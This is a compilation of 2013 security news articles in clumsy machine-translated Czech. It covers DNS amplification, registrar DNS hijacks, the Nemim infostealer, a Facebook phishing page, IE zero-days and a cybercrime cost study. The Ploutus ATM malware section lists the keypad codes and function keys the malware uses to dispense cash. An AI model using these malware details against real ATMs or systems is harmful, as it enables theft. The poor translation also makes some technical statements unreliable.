dhs.gov. 28800 IN NS use1.akam.net.
dhs.gov. 28800 IN NS asia2.akam.net.

; DALŠÍ SEKCE:
eur2.akam.net. 58651 IN A 2.16.40.64
usc2.akam.net. 90000 IN A 69.31.59.199
use1.akam.net. 86294 IN A 72.246.46.2
use3.akam.net. 90000 IN A 204.2.179.179
usw3.akam.net. 90000 IN A 69.31.59.199
asia2.akam.net. 67094 IN A 195.10.36.47
asia3.akam.net. 12225 IN A 222.122.64.134

; Doba: 2 ms
; SERVER: 199.58.210.9 # 53 (199.58.210.9)
; KDY: Pátek 16 srpen 2013 17:20:58
; MSG SIZE rcvd: 4453

Jak můžete vidět, kováním správné dotaz útočník může způsobit značné škody proti hostiteli, a to i s poměrně skromným botnetu. Další výhodou útoku amplifikační DNS je to, že je prakticky nezjistitelné. Útoky Zdá se, že pochází z DNS serverů po celém internetu, které jsou s největší pravděpodobností nebude přihlášení požadavky - takže tam není ani stopa zpět do botnetu členy, natož náš koktejl milující hacker.

Nejprve navrhoval Paul vixie a Vernon Schryver v dubnu 2012 DNS Hodnotit Réponse Omezení (RRL) je metoda pro zabránění ukládání do mezipaměti serveru byla využívána v útoku Amplification DNS udržuje informace o typech dotazů, které byly provedeny. Takže to nemění povahu DNS namísto samotný server udržuje sleduje typy a počty provedených dotazů a omezuje počet odpovědí, že se vrátí. Doporučuji čtení plnou technickou poznámku pro všechny detaily, ale to scvrkává, že v BIND správce může nyní vytvářet omezení založených na oblastech, jako jsou odpovědí za sekundu, chyby za sekundu, netblocks, na které odpovědi jsou odesílány a další. RRL schopnost je implmented v BIND 9.9.4, doufejme, že ostatní DNS implementace následovat.

ISC , organizace, která udržuje BIND zdrojový kód nabízí bezplatný webinář o tom, jak implementovat DNS rll dne Středa 21 srpen, pokud se chcete dozvědět více o této schopnosti.


Tajemník v Metasploit DNS únos Ne podvedeni faxem
15.10.2013 Hacking | Zabezpečení

Registrátor pro Metasploit a Rapid7 webové stránky, z nichž oba stali obětí únosu DNS útok v pátek, nebyl podvedeni podvodného změnu žádosti zaslané faxem, neboť se původně psalo.

Místo toho, zaměstnanec Register.com pravděpodobně padl za oběť na sociální inženýrství podvod, který vyústil ve ztrátu zaměstnance legitimní pověření, které byly použity, aby infiltroval registrátora a manipulovat nastavení DNS pro obě místa.

Domovské stránky pro Metasploit a Rapid7 ukázal na stránkách údajně patřící k pro-palestinského hacker kolektivní jít podle jména KDMS. Skupina unesl stránky a návštěvníci byli uvítáni s poznámkou, prohlašovat odpovědnosti za útoky a podobné DNS únosy prováděné s jinými bezpečnostními společnostmi.

Rapid7 mluvčí řekl, že Register.com aktualizováno dnes firma s tím, že původní zpráva byla neúmyslně sdělí Register.com.

"Čekáme obdržet zprávu od Register.com a my přesně nevíme, kdy budeme si to (i když samozřejmě doufáme, že na to co nejdříve)," Rapid7 uvedl v prohlášení zaslaném Threatpost . "Jakmile budeme mít informace, budeme naprosto sdílet to, co můžeme pomoci vzdělávat ostatní, aby mohli chránit před stejnými hrozbami."

Rapid7 šéf bezpečnosti a Metasploit tvůrce HD Moore řekl přes proud tweetů v pátek ráno, že DNS únos byl rychle vyřešen a varoval ostatní pracující s Register.com kontrolovat jejich příslušné DNS záznamy, protože skupina prohlašovat, že odpovědnost by měli schopnost přesměrování Je-li doména s tímto registrátora.

Útok na Register.com završen rušný týden podobných útoků proti registrátorů. KDMS prohlásil odpovědnost za útok proti Network Solutions, velký sídlem v USA registrátor domén a poskytovatel hostingu. Řada bezpečnostních agentur práce s Network Solutions utrpěl podobné DNS únosy a musel provoz přesměrován na KDMS kontrolované domény.

Podobný útok byl proveden proti LEASEWEB, ačkoli to bylo původně oznámeno, že registrátor byl ohrožen prostřednictvím zneužití chyby zabezpečení v prostředí klient WHMCS a fakturační software používaný společností. To bylo rychle vyvráceno LEASEWEB v prohlášení na svých internetových stránkách; LEASEWEB řekl, že útočníci získat doménové heslo správce a použít pověření pro přístup k registrátora.

WHMCS chyba, která byla oprava byla zneužita k útoku na čisté VPN. Útočníci byli schopni dosáhnout poskytovatele VPN uživatelské databáze a rozeslat hromadný email, který řekl, že podání bylo třeba vypnout a někteří zákazníci mohli brzy ozvete činných v trestním řízení.

"Další a důkladný audit na naší VPN systémů potvrdila, že tam není absolutně žádná porušení v síti VPN a po incidentu naše služby VPN nadále provozovat bezpečně," PureVPN spoluzakladatel Uzair Gadit napsal v e-mailu pro zákazníky. "Žádné technické údaje o používání byla ohrožena, a protože jsme neskladujte aktivitě uživatelů protokoly jsou naši uživatelé se tímto jisti, plné anonymity a bezpečnosti po celou dobu."


Infostealer.Nemim: Jak Všudypřítomná Infostealer dále vyvíjet
15.10.2013 Viry | Hacking

Dříve jsme blozích Backdoor.Egobot a nastínil, jak se zaměřuje na konkrétní odvětví a současně udržuje nízký profil. Mezi zločinci za sebou Egobot také vyvinuli Infostealer.Nemim pro rozšíření a převládající kampaně. I přes rozdíly v rozsahu, jak hrozby krást informace z napadených počítačů, a existují náznaky, tyto dvě hrozby pocházejí ze stejného zdroje.

Nemim komponenty

Symantec zjistil Nemim ve volné přírodě již na podzim roku 2006. Jeden z prvních vzorků obsahovalo časovače mechanismus pro určení, kdy se odstranit z napadeného počítače. Odstranění bylo podmíněno a vázáno na pevné datum, nebo na základě počtu případů, kdy byl vzorek provést. Časovač mechanismus funkce byla také nalezena ve vzorcích Egobot.

V Nemim vzorky jsme analyzovali byly digitálně podepsány s ukradenými certifikáty a po čase byl malware aktualizován tří složek:

Infektor složka
Downloader složka
Informace zloděj složka

Infektor složka

Infector komponenta je navržena tak, aby infikovat spustitelné soubory v určitých složkách. Zejména se zaměřuje na infector% USERPROFILE% složku a všechny její podsložky.

Infekce není propracovanější. Nemim zkopíruje do nové části s názvem. Rdat kdy ve spodní části infikovaného souboru. Původní vstupní bod z infikovaného souboru se mění, aby se poukázat na Nemim kódu v. Rdat části. Infekce kód je zodpovědný za dešifrování klesá a běží vložený spustitelný soubor v následující cestě:

AllUsersProfile%% \ Application Data \ Microsoft \ Display \ igfxext.exe
Tento soubor je vykonán součást downloader.

Downloader složka

Komponenta Downloader slouží jako obálka pro šifrovaný spustitelný soubor. Po dešifrování je šifrovaný spustitelný soubor načten dynamicky. Tento šifrovaný spustitelný soubor obsahuje aktuální downloader funkčnost. Nicméně, před stažením, malware sklizně následující informace o systému z napadeného počítače:

Název počítače
Uživatelské jméno
CPU jméno
Operační systém verze
Počet zařízení USB
Místní adresa IP
MAC adresa

Tento sklizené informace šifrována, konvertoval k Base64, a poslal na velení a řízení (C & C) serveru, stejně jako Egobot. Sklizené informace zobrazitelné na C & C serveru v nešifrované podobě. Například proměnná P2Pdetou zobrazí název počítače a uživatelské jméno: [Název počítače] @ [jméno uživatele]. Server pak odpoví základních příkazů, včetně užitečného zatížení, který je přetažen a popraven. Downloader pak očekává, že server odpoví "minmei" string doprovodu z následujících příkazů:

nahoru
re
ne
Do příkazu, například vyplývá, že se stažená data obsahuje spustitelný náklad, který Downloader dešifrovat a běh.

Informace zloděj složka

Informace zloděj komponenty mohou krást uložená pověření účtu z následujících aplikací:

Internet Explorer
Mozilla Firefox
Google Chrome
Microsoft Outlook
Outlook Express
Windows Mail
Windows Live Mail
Gmail Notifier
Google Desktop
Google Talk
MSN Messenger
Informace zloděj ukradl pošle data zpět do C & C serveru a stejně jako downloader, očekává "minmei" řetězec v odpovědi.

Zeměpisné rozložení a ochrana

Japonsko a Spojené státy jsou hlavní cíle Nemim, následované Indií a Spojeným královstvím.

Symantec detekuje všechny komponenty těchto hrozeb pro ochranu zákazníků před útoky:

Infostealer.Nemim
Infostealer.Nemim! Inf
Downloader.Nemim! Gen1
W32.Nemim

Nemim a Egobot připojení

Analýza Nemim binární ukázal připojení k Backdoor.Egobot z několika podobnosti u obou hrozeb.

Nemim

Egobot

Informace shromážděné v určitých formátech pomocí specifické značky

Sys @ Uživatel:% s @% s (% s)
CPU:% s
Systém OS:% s (% s)
Čistá karta:% s (% s)

Sys @ Uživatel:% s @% s (% s)
CPU:% s
Systém OS:% s (% s)
Čistá karta:% s (% s)

Informace o šifrování

Šifrované a base64

Šifrované a base64

C & C komunikační formát

[URL / IP] / [cesta] / [SOUBOR]. Php? A1 =
% s & a2 =% s ​​& a3 =% s

[URL / IP] / [cesta] / [SOUBOR]. Php? Arg1 =
% s & arg2 =% s ​​& arg3 =% s

Kód injekční technika

Microsoft objížďky funkce
(první verze)

Microsoft objížďky funkčnost
(všechny verze)

Na základě těchto podobností a překrývající se časové osy obou kampaní, že je zřejmé, že Nemim a Egobot pocházejí ze stejného zdroje.

Potenciál pro nové kampaně

Nemim funguje i dnes a účinně se v průběhu času. Například řetězec šifrování se stal non-triviální, že ukradené digitální certifikáty byly modernizovány s novějšími, a tam jsou nyní kontroly na místě pro detekci běžných virtuálních strojů. Opravdu, za posledních sedm let útočníci ukázaly neochvějné odhodlání k inovacím a vyvinuli malware, který je adaptabilní, aby vyhovovaly potřebám dvou různých útočných kampaní. Očekáváme, že tento trend bude pokračovat inovovat s vysokým potenciálem pro nové kampaně.


Neskutečná Facebook přihlašovací stránka krade přihlašovací údaje, tlačí malware
14.10.2013 Viry | Hacking | Kriminalita

Symantec vědci nedávno narazil na phishing, který skrývá dvojí pohroma: místo požádá uživatele buď přihlásit do Facebooku nebo stáhnout aplikaci, aby došlo k aktivaci fiktivní službu, která bude pravděpodobně dejte jim vědět, kdo navštívil svůj profil na Facebooku (tlačítko Na obrázku pro jeho zvětšení): Pro ty, kteří se rozhodnou pro první možnost a zadejte své přihlašovací údaje Facebook zpráva je špatná: své uživatelské jméno a heslo bylo zasláno na phisherů a bude pravděpodobně použita pro únos účtu oběti. Pro ty, kdo si vybral druhou možnost by zpravodajství mohlo být ještě hůř. Soubor ( WhoViewedMyfacebookProfile.rar ) nabízíme ke stažení obsahuje informace-krást Trojan, který může potenciálně shromažďovat všechny druhy důvěrných informací z počítače oběti a pachatele - včetně osobních, finančních a přihlašovací údaje pro různé on-line služeb - a je nastaven na odeslat tak na útočníkův e-mailovou adresu. Avšak, jak výzkumníci zjistili, že e-mailová adresa nebyla platná 3 měsíce, takže informace je poslán a ztratil na virtuální černé díry internetu. Přesto může malware dostat aktualizovány kdykoli a e-mailová adresa v otázce změněn na platný jeden. "Pokud uživatelé padl za oběť phishing zadáním své přihlašovací údaje, by phishingu úspěšně ukradl své informace za účelem krádeže identity , " vědomí vědci. K phishingu pověření, pak je samozřejmě poslal na servery ovládaných útočníků, a to na výše uvedený e-mailovou adresu. Ale ať už to phishing podvod je stil aktivní nebo ne není místo, protože jiné podobné ty se objevují každý den. Dobrá věc k zapamatování je, dávat pozor na to, kde zadáváte vaše bankovní údaje (vždy zkontrolujte, zda je adresa URL je správná, a nemusí sledovat odkazy z nevyžádaných e-mailů) a jaký software stáhnout (nepřijmete software, nepožádali o, a buďte opatrní při hledání software on-line - držet se stanovených místech ke stažení).


Zločinci Hit Jackpot ATM

12.10.2013 Hacking | Zabezpečení

Je dobře známo, že organizovaný zločin v Mexiku je vždy najít nové způsoby, jak krást peníze od lidí. Bankomaty (ATM) jsou jedním ze společných cílů v tomto úsilí, ale výzva je zde skutečně dostat peníze ven ze stroje. Tři nejběžnější způsoby, jak toho dosáhnout, jsou:

Únos: Zločinci unesou člověka tak dlouho, jak je potřeba stáhnout všechny peníze ze svého účtu. Doba je závislá na dostupných finančních prostředků na účtu, protože normálně tam je limit na povolené částky, které mají být vydávány za den.
Fyzicky krádež bankomatu: Zločinci odstranit bankomat a vzít ji na místo, kde mohou jít do práce přístup k hotovosti uvnitř. V tomto scénáři, ztráta hotovosti je jen jedním z důsledků jako zločinci by měli získat přístup k softwaru běžícího na bankomatu, který by mohl být reverse-inženýrství s cílem připravit útok na všech bankomatů běží stejný software.
Bankomat Odstřeďování: Zařízení jsou umístěna nad čtečkou karet, aby se krást osobní informace (PII) dat, jako je PIN čísla. Falešná překryvy numerické klávesnici lze také použít pro záznam, které stisknutí tlačítek.
Zatímco výše uvedené scénáře všichni spoléhají na vnějších faktorech, uspět by zločinci jako nic víc než způsob, jak pro ně, aby si chrlí Bankomat všechny její peníze pouhým stisknutím některých tlačítek (podobně jako demo předložené pozdní Barnaby Jack na BlackHat 2010 je konference). Bohužel pro banky, zdá se, že sny padouchy "může přijít pravda. V souběžných vyšetřováních s ostatními AV firem Symantec identifikoval tento vzorek 31. srpna 2013 a detekce byla v platnosti od 4.9.2013. Zjistíme tento vzorek jako Backdoor.Ploutus .

Infekce metodika

Podle vnějších zdrojů, je malware převedena do bankomatu fyzicky vložením nové spouštěcí disketu do jednotky CD-ROM. Spouštěcí disketa přenese malware.

Účinek

Zločinci vytvořil rozhraní pro interakci s ATM softwaru na sníženou bankomatu, a proto jsou schopni stáhnout všechny dostupné peníze z nádobách v hotovosti, také známý jako kazety.

Jedna zajímavá část poznamenat, že zločinci jsou také schopni přečíst všechny informace zadané do držitelům karet prostřednictvím bankomatu klávesnice, což jim umožňuje krást citlivé informace bez použití jakéhokoliv externího zařízení.

Ačkoli žádné potvrzení o přijetí od ostatních zemí jsou postiženy touto hrozbou by banky v jiných zemích používají stejný software Bankomat být v ohrožení.

Technické vlastnosti Backdoor.Ploutus

Běží jako služba systému Windows s názvem NCRDRVPS
Zločinci vytvořil rozhraní pro interakci s ATM software na sníženou bankomatu skrze třídu NCR.APTRA.AXFS
Jeho jméno je binární PloutusService.exe
To bylo vyvinuto s. NET technologií a zakódovány pomocí software Confuser 1,9
To vytvoří skryté okno, které lze spustit zločinci komunikovat s bankomatu
Interpretuje určité kombinace kláves, které do zločinců, například příkazy, které lze přijímat buď externí klávesnici (který musí být připojen k bankomatu), nebo přímo z klávesnice
Akce prováděné Backdoor.Ploutus

Vytvořit Bankomat ID : Náhodně generované číslo přiřazené ohrožena ATM, založený na aktuální den a měsíc v době infekce.
Aktivace ATM ID : Nastavuje časovač pro peníze vydávají. Malware se peníze vydávají pouze v rámci prvních 24 hodin poté, co byl aktivován.
Aplikujte hotovosti : peníze vydávají na základě množství požadované zločinci.
Restart (služba): Obnovit obejít časový interval.
Seznam příkazů uvedených výše musí být provedena v pořadí, protože musí používat non-prošlou aktivaci ATM ID vydávat hotovost.

Zdrojový kód obsahuje španělské názvy funkcí a nízkou anglickou gramatiku, která naznačuje, malware může být kódováno španělsky mluvících vývojářů.

Interakce s Backdoor.Ploutus pomocí klávesnice

Jak již bylo zmíněno, tento typ interakce nevyžaduje další klávesnice, které mají být připojeny.

Následující příkaz kódy, zadat pomocí klávesnice ATM a jejich účel jsou následující:

12340000 : Chcete-li otestovat, zda je klávesnice přijímat příkazy.

12343570 : Vytvořit Bankomat ID, který je uložen v položce DATAA v souboru config.ini.

12343571 XXXXXXXX: Má dvě akce:

Aktivace Bankomat ID generováním aktivačního kódu na základě kódovaného ATM číslo a aktuální datum. Tato hodnota je uložena v DATAC položky v souboru config.ini. Osm bajtů načítají musí být platná kódovaný ATM ID generované funkce nazývá CrypTrack (). Platný ATM aktivační kód musí být získáno, aby ATM obejít hotovosti.
Generování časového úseku: Nastavuje časovač pro peníze vydávají, bude hodnota uložena v datab položky v souboru config.ini.
12343572 XX: Příkazy bankomat na peníze vydávají. Odstraněné číslice představují počet účtů k okamžitému použití.

Interakce s Backdoor.Ploutus přes GUI

Tato metoda vyžaduje použití externí klávesnice.

F8 = Pokud Trojan je okno skryto pak je zobrazí na hlavní obrazovce bankomatu, což zločinci posílat příkazy.

Po Trojan se zobrazí okno, následující klíčové příkazy vydané stisknutím příslušné klávesy na klávesnici:

F1 = Generovat Bankomat ID

F2 = Aktivovat Bankomat ID

F3 = dávkujte

F4 = Zakázat Trojan okno

F5 = KeyControlUp

F6 = KeyControlDown

F7 = KeyControlNext

F8 = KeyControlBack

Mexické bankomaty 2.png

Obrázek. Trojan klávesové zkratky

Aplikujte proces ohrožena

Je jasné, že zločinci mají reverzní inženýrství ATM softwaru a přišel s rozhraním k interakci s ním, a přestože nejsme ATM architekti, založené na kódu Prověřili jsme my můžeme odvodit, že Backdoor.Ploutus má následující funkce :

To bude identifikovat dávkovače zařízení v bankomatu.
To pak dostane počet kazet v zásobníku a zatížení je. V tomto případě se předpokládá, že malware je maximálně čtyř kazet v zásobníku, protože ví, že se koncepce ATM modelu.
Dále se vypočítá částku upustit na základě vyúčtování poskytnutých počtu, který je vynásobený hodnotou peněžních jednotek.
To pak spustí vydávají hotovost operaci. Pokud se kterýkoli z kazet mají méně než 40 jednotek (účty) jsou k dispozici, pak místo dávkování požadovanou částku, bude vydávat všechny své zbylé peníze uložili k dispozici v té kazetě.
Nakonec to bude opakovat krok pro všechny zbývající čtyři kazety, dokud se všechny peníze zpět z bankomatu.
Bankomaty lze chrlit hotovosti na místě, blízko vás ...

Co tento objev zdůrazňuje, je zvyšující se úroveň spolupráce mezi tradičními fyzický svět zločinců s hackery a zločinci. Se stále rostoucí využití technologií ve všech aspektech bezpečnosti, tradiční zločinci si uvědomují, že k provedení úspěšné loupeže, nyní vyžadují jiný soubor dovedností, které nebyly požadovány v minulosti. Moderní zloději bankovní den, nyní je třeba kvalifikovaných IT odborníků z praxe o jejich týmu, které jim pomohou plnit jejich loupeže. Tento typ, co se děje nejen ve filmech, to se děje v reálném životě, možná u bankomatu u vás.


Nový Internet Explorer Zero-day útoky proti Cílená v Koreji a Japonsku
12.10.2013 Zranitelnosti | Hacking

V Microsoft Patch Tuesday pro říjen 2013 společnost vydala MS13-080 řešit dvě zásadní chyby, které byly aktivně využívány v omezených cílených útoků. První kritická chyba v aplikaci Internet Explorer, Microsoft Internet Explorer chyby zabezpečení poškození paměti (CVE-2013-3893), byla projednána v dřívější blogu společnosti Symantec .

Druhým zásadním chyba v aplikaci Internet Explorer je prohlížeč Microsoft Internet Explorer Chyba zabezpečení poškození paměti (CVE-2013-3897). V blogu od Microsoftu , společnost popisuje, jak tento problém je use-after-bez zranitelnost CDisplayPointer spustil s onpropertychange obslužnou rutinu události. Blog pokračuje vysvětlením, jak exploit využívá JavaScript, haldy sprej přidělit malé ROP řetěz kolem adresu 0x14141414. Když nalezený v divočině, byl navržen tak, aby exploit zaměřují pouze na Internet Explorer 8 v systému Windows XP pro korejské a japonské jazykové bázi uživatele. Pro zákazníky společnosti Symantec, následující je ochrana již u tohoto útoku:

Antivirus:
Trojan.Maljava
Trojan.Malscript
Backdoor.Trojan
Downloader.Tandfuy

Intrusion Prevention System:
Web útok: Škodlivý JavaScript Heap Spray Generic

Symantec telemetrie ukazuje, že útok využívají CVE-2013-3897 začalo kolem 11.9.2013 a že ovlivněn především jihokorejské uživatelům, kvůli tomu, jak se webové stránky na populární korejské blogů stránky slouží k přesměrování uživatele na místě konání využít.

Symantec nadále vyšetřuje tento útok s cílem zajistit, že nejlepší možná ochrana je k dispozici. Jako vždy doporučujeme, aby uživatelé zachovat jejich systémy up-to-data s nejnovějšími oprav softwaru. Rovněž doporučujeme zákazníkům využívat nejnovější technologie Symantec a začlenit nejnovější Norton spotřebitele a Symantec Enterprise řešení , aby co nejlépe chránit před útoky tohoto druhu.

Aktualizace - 09.10.2013:
Společnost Symantec vydala další IPS podpis k ochraně proti CVE-2013-3897:
Web útok: Internet Explorer poškození paměti CVE 2013-3897

Update - 11.10.2013:
Společnost Symantec vydala další AV detekce pro ochranu proti CVE-2013-3897:
Bloodhound.Exploit.518


Policie žádá DNS poskytovatele, aby se trestní místo, výkonný ředitel požádá o soudní příkaz
11.10.2013 Hacking | Bezpečnost

Mark Jeftovic, generální ředitel Torontu registrátora domény a spravovat DNS poskytovatele EasyDNS, vydal (druhý) dopis, že jeho společnost obdržela od policie britské duševního oddělení majetkové kriminality žádostí o pozastavit přístup k doméně, která je údajně "dělat nezákonné finanční zisky . pachatelům trestné činnosti na to " poté, co uvedla, že webové stránky v pochybnost je BitTorrent vyhledávač, který zdánlivě nemá žádné hostit torrent soubory, on rozdělil podle pokynů výše uvedené policejní jednotky: zmrazit whois záznam pro doménu a přesměrování DNS na to, aby jiné zvláštní domény hosting toto oznámení (s odkazy):

Pokud EasyDNS odmítne učinit, policie si vyhrazuje právo předat věc ICANN, v dopise, a naznačil, že EasyDNS mohl ztratit svou akreditaci s ICANN. ale Jeftovic, jehož firma poněkud překvapivě stala poskytovatelem DNS na stránky WikiLeaks v roce 2010 po sobě jeden z nich odmítl další služby kvůli DDoS útoků, které zmrzačené svých webových serverech, řekl, že nic z toho. "Kdo rozhoduje o tom, co je nelegální? Co dělá někdo zločinec? Vzhledem k tomu, že podtext žádost obsahuje hrozbu odvolat záležitost organizaci ICANN, pokud nebudeme hrát dál, to je non-triviální otázka, "řekl napsal na svém blogu. "Opravte mě, jestli se mýlím, ale vždycky jsem si myslel, že to bylo něco, že se rozhoduje u soudu práva, jak protichůdný k "nějakým chlapem na internetu" odesílání e-mailů. když je to dost dostatečný důvod pro některé registrátory sundat doménová jména, to nelétá tady. " "Máme závazek vůči našim zákazníkům a jsme povinni naši registrátora akreditaci dohod nesmí dělat jakékoliv změny našich zákazníků nastavení bez platného FOA (druhu povolení). aby nahradily, že potřebujeme právní základ. Chcete-li získat právní základ se má něco stát u soudu, "podotkl, a dodal, že nebyly strženy doménu, a že reagoval na policii říká, že by měl dostat soudní příkaz.


Google Malajsie Site unesených
11.10.2013 Hacking | Počítačový útok

Domény Google pro Malajsii byl unesen ve čtvrtek v noci, přesměrování návštěvníků na stránku, která řekl skupina volala Madleets z Pákistánu hrál útok. Doména byla obnovena hned, ale jmenné servery pro doménu se změnila na páru řízené útočníky.

MYNIC, společnost, která spravuje zemi TLD pro Malajsii, potvrdil útok v prohlášení vydaném v pátek ráno s tím, že jeho vnitřní reakce na incidenty tým vyřešil problém během krátké doby se dozvěděl o útoku.

"Můžeme potvrdit, došlo k neoprávněnému přesměrování www.google.com.my a www.google.my na jinou adresu IP ze skupiny, která se nazývá tým MADLEETS," prohlášení říká.

"Problém byl varován v časných ranních hodinách a MYNIC Computer Security Incident Response Team (CSIRT), začal okamžitě problém vyřešit. Doménové jméno www.google.com.my byla obnovena do své správné informace ve 07:10 dnes a www.google.my stále řešení. "

Útok zjeví se byli DNS cache otrava útok, takže spíše než najít normální Google domovskou stránku v Malajsii, návštěvníci byli přesměrováni na stránky hostované v Kanadě. Oba google.com.my a google.my byla unesena během útoku. Integricity, společnost, která spravuje domény Googlu v Malajsii, řekl, že útok trval několik hodin, začíná po půlnoci místního času.

"Těsně po půlnoci dne 11. října 2013 naše FatServers bylo operační středisko oznámeno neoprávněnému aktualizace do jedné z domén, které jsou v naší péči - google.com.my, " prohlášení říká.

"Okamžitě jsme se pokusil přihlásit do MYNIC prodejce systému na kontrolu stavu, ale byl neschopný dělat tak. Servery DNS pro tuto doménu byly změněny, a to způsobilo na adresu URL odkázán na stránku, která zobrazuje stránky byly napadeny hackery. "


Neočekávaný IE Zero Day užívaných v bankovnictví, hry Útoky
10.10.2013 Zranitelnosti | Hacking | Bezpečnost

Jednalo se o dva-pro-jeden obchod, který správcům systému Windows mohl udělat bez.

Již očekával jednu náplast Internet Explorer zero-day aktivně využívány, správci dostali opravy pro dva nula dní místo dnes jako součást října 2013 Microsoft aktualizace Patch Tuesday zabezpečení.

Druhý překvapivě, zejména organizace již kymácející se ve větru bez náplasti po dobu jednoho IE chyby použitého v aktivních útoků, a pro které Metasploit exploitu byl k dispozici. Bonus oprava byla pro nepříbuzného chyby ve volné přírodě na blízko měsíčně a také zaměření organizace v Japonsku a Koreji, podobně jako první den nula.

Vědci z Národního Cyber ​​bezpečnostního střediska v Nizozemsku, IOprotect GmbH a Trustwave SpiderLabs byly připsány v poradenských společností Microsoft za oznámení chyby zabezpečení. SpiderLabs "ředitel bezpečnostního výzkumu Ziv Mador řekl Threatpost společnosti výzkumníci byli sledování útoku server, který měl ještě před dvěma týdny byla slouží využije pro záplatami zranitelností pouze. To se změnilo na 12 září, Mador řekl, když provozují IE 8 probublává na povrch, že jeho vědci předtím neviděl.

"To se používá k distribuci malwaru obecný," řekl Mador. "Na rozdíl od předchozího nulové den v IE, tohle distribuuje malware krást přihlašovací údaje z online hráčů, nebo přerušit přístup na stránky bank. Je to obecně malware, ne cílené útoky. "

Dříve hlášeny IE nula den byly použity ve velmi cílené útoky proti japonským mediálních společností. Mediální stránky byly ohroženy jako součást útoku zalévání děr a sloužili využije, podle výzkumníků na FireEye, zaměřených na vládu, high-tech a výrobních organizací v Japonsku. FireEye nazval rozsáhlý shromažďování informací operace.

Microsoft se pustil Fix-It nástroj jako dočasný zmírnění na odhalení, že útoky byly v divočině. Minulý pátek byl exploit Metasploit modul přidá do nástrojů, stupňovat možnost, že rozšířenější útoků by mohla být na spadnutí.

Druhý den nula cílené uživatele v Japonsku a Koreji přes drive-by download. Jeden rys je jeho schopnost identifikovat jazyk infikovaný počítač byl nakonfigurován tak, aby. Pokud ani Japonec Korejský ani by IE přesměrovat na Google a útok by byla ukončena, Trustwave řekl blogpost.

Nicméně, pokud se ověřuje jazyka a IE 8, útok používá ROP řetězy obejít ochranu nativní paměti na Windows, jako je DEP a ASLR.

Útok náklad obsahuje ne méně než 10 řidičů, spustitelné soubory a DLL klesl na oběti stroj, Trustwave řekl. Pokusí se zakázat řadu bezpečnostních produktů na počítači, přesměrování bankovní weby k útočníkovi kontrolované oblasti a také komponenty, které se snaží ukrást herní pověření.

"Exploit není triviální a tyto typy využije často nejsou triviální. Vyžadují řadu velmi kreativních kombinací do práce, "řekl Mador. "To byl ten případ."

Kromě ROP řetězců, útok také používá element modelu DOM vlastností Spray techniky používané v jiných IE nula den opravenou včera.

"Existuje milion způsobů, jak rozvíjet HTML stránky nebo webové aplikace, tolik atributů, tagy, skripty. Lidé, kteří vyvíjejí prohlížeče budou muset vypořádat s obrovským množstvím možných scénářů, "Mador řekl a ukázal na množství přírodních míst, kde zranitelná kód by mohl skrývat v parsování a vykreslování některé z těchto složek.

"Když se podíváme na kód zneužití je pro prohlížeče zranitelnosti, často používají podivné kombinace z hlediska HTML, které nedávají smysl," řekl Mador. "Nezdá se, že ukázat něco zajímavého, ale účel kombinací je vyvolat nějakou chybu zabezpečení v kódu syntaktické analýzy nebo správu paměti."

Patch byl součástí kumulativní aktualizace pro IE řešena v MS13-080 , tj. byla oprava téměř každý měsíc v roce 2013, včetně mimo pásmo náplasti na začátku tohoto roku.


Náklady a frekvence kybernetických útoků na vzestupu
10.10.2013 Hacking | Kriminalita
Náklady, frekvence a času k vyřešení kybernetickými útoky nadále růst již čtvrtý rok po sobě, podle celosvětové studie společnosti HP a Ponemon Institute. 2013 náklady na studium v počítačové trestné činnosti zjištěno, že průměrná roční cena kyberkriminality vzniklé srovnávacího vzorku organizací ve Spojených státech byl 11.560.000 dolarů, což představuje 78 procentní nárůst od úvodní studie byla provedena před čtyřmi lety. Výsledky také ukázal, že čas potřebný k vyřešení kybernetického útoku se zvýšil o téměř 130 procent v tomto období s průměrnými náklady vzniklé vyřešit jeden útok ve výši více než 1 milión dolarů. sofistikovanost kybernetických útoků exponenciálně roste v posledních letech, protože protivníci jak specializovat a sdílení informací s cílem získat citlivé údaje a narušují kritické podnikové funkce. Podle studie pokročilých nástrojů zabezpečení, jako jsou zpravodajské informace o zabezpečení a správu událostí (SIEM), síťové zpravodajských systémů a velkých datových analýz, mohou významně přispět ke zmírnění dat hrozby a snížit náklady na počítačové trestné činnosti. Klíčové závěry zahrnují:

Průměrná roční cena kyberkriminality vzniklé organizace byla za 11.560.000 dolar, s rozmezí $ 1,3 milionu 58000000 dolar. To je nárůst o 26 procent, nebo 2600000 dolarů, více než průměrné náklady vykázané v roce 2012.
Organizace zažili v průměru 122 úspěšných útoků týdně, a to z 102 útoků týdně v roce 2012.
Průměrná doba k vyřešení kybernetického útoku bylo 32 dnů, s průměrnou nákladů vynaložených během tohoto období 1.035.769 dolarů nebo 32.469 amerických dolarů na den-a 55 procentní nárůst oproti loňským odhadované průměrné náklady na 591780 dolarů pro 24-ti denní lhůty.
"Prostředí hrozeb se neustále vyvíjí, jak kybernetických útoků roste v propracovanosti, četnost a finanční dopad," řekl Frank Mong, viceprezident a generální ředitel divize Solutions, Enterprise Security Products společnosti HP. "Pro čtvrtý rok po sobě, jsme viděli úspory nákladů, které inteligentní nástroje pro zabezpečení a řízení postupů může přinést organizacím, a jako HP, jsme odhodláni nadále poskytovat oba špičková řešení a výzkum dále narušit ohrožení životního cyklu protivníka. " Skutečné náklady na kybernetických útoků:

Nejdražší cybercrimes jsou způsobeny denial-of-service, škodlivý, zasvěcených a web-based útoky, které dohromady představují více než 55 procent všech nákladů na počítačové trestné činnosti organizace na roční bázi.
Informace krádeže nadále představují nejvyšší externích nákladů, které se podnikatelské činnosti a těsně za ním. Na roční bázi, ztráta informace představuje 43 procent celkových externích nákladů, pokles o 2 procenta od roku 2012. Obchodní narušení nebo ztráta produktivity představuje 36 procent externích nákladů, což představuje nárůst o 18 procent oproti roku 2012.
Obnova a detekce jsou nejnákladnější interní činnosti. Za uplynulý rok, využití a detekce v kombinaci tvořily 49 procent celkových nákladů vnitřní činnosti, s úbytky hotovosti a práce představují většinu těchto nákladů.
Počítačová kriminalita cena se liší podle velikosti společnosti, ale menší organizace vynaložit podstatně vyšší náklady na jednoho obyvatele než větší organizace.
Organizace v oblasti finančních služeb, obrany a energetiky a utilit zažít počítačové trestné činnosti podstatně vyšší náklady než v maloobchodě, pohostinství a spotřebních výrobků.
Bezpečnostní informační řešení a postupy řízení a správy, aby rozdíl:
Organizace využívající technologie BIS byli efektivnější při odhalování a obsahující kybernetickým útokům, dochází v průměru úspory ve výši téměř 4.000.000 dolarů ročně, a 21 procent návratnosti investic (ROI) oproti jiným technologických kategorií.
